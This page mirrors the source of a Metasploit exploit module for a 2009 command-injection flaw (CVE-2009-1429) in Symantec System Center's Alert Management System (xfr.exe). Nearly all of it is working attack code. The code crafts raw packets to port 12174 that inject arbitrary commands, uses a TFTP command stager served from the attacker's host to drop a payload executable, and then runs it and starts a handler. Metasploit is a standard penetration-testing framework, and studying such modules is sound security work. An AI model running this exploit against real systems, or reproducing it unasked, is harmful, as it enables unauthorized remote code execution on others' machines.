Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/antivirus/ams_xfr.rb
19639 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::CmdStager

10
  include Msf::Exploit::Remote::Tcp

11
  include Msf::Exploit::EXE

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        'Name' => 'Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execution',

18
        'Description' => %q{

19
          Symantec System Center Alert Management System is prone to a remote command-injection vulnerability

20
          because the application fails to properly sanitize user-supplied input.

21
        },

22
        'Author' => [ 'MC' ],

23
        'License' => MSF_LICENSE,

24
        'References' => [

25
          [ 'CVE', '2009-1429' ],

26
          [ 'BID', '34671' ],

27
          [ 'OSVDB', '54157' ],

28
          [ 'ZDI', '09-060' ],

29
          [ 'URL', 'http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20090428_02' ]

30
        ],

31
        'Targets' => [

32
          [

33
            'Windows Universal',

34
            {

35
              'Arch' => ARCH_X86,

36
              'Platform' => 'win'

37
            }

38
          ]

39
        ],

40
        'CmdStagerFlavor' => 'tftp',

41
        'Privileged' => true,

42
        'Platform' => 'win',

43
        'DefaultTarget' => 0,

44
        'DisclosureDate' => '2009-04-28',

45
        'Notes' => {

46
          'Reliability' => UNKNOWN_RELIABILITY,

47
          'Stability' => UNKNOWN_STABILITY,

48
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

49
        }

50
      )

51
    )

52


53
    register_options(

54
      [

55
        Opt::RPORT(12174),

56
        OptString.new('CMD', [ false, 'Execute this command instead of using command stager', ""]),

57
      ]

58
    )

59
  end

60


61
  def windows_stager

62
    print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")

63
    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']

64
    execute_cmdstager({ temp: '.', tftphost: tftphost })

65
    @payload_exe = generate_payload_exe

66


67
    print_status("Attempting to execute the payload...")

68
    execute_command(@payload_exe)

69
  end

70


71
  def execute_command(cmd, opts = {})

72
    connect

73


74
    len = 2 + cmd.length

75


76
    data = [0x00000000].pack('V')

77
    data << len.chr

78
    data << "\x00"

79
    data << cmd + " "

80
    data << "\x00"

81


82
    sock.put(data)

83


84
    res = sock.get_once

85


86
    if (!res)

87
      print_error("Did not received data. Failed?")

88
    else

89
      print_good("Got data, execution successful!")

90
    end

91


92
    disconnect

93
  end

94


95
  def exploit

96
    unless datastore['CMD'].blank?

97
      print_status("Executing command '#{datastore['CMD']}'")

98
      execute_command(datastore['CMD'])

99
      return

100
    end

101


102
    case target['Platform']

103
    when 'win'

104
      windows_stager

105
    else

106
      fail_with(Failure::Unknown, 'Target not supported.')

107
    end

108


109
    handler

110
  end

111
end

112


113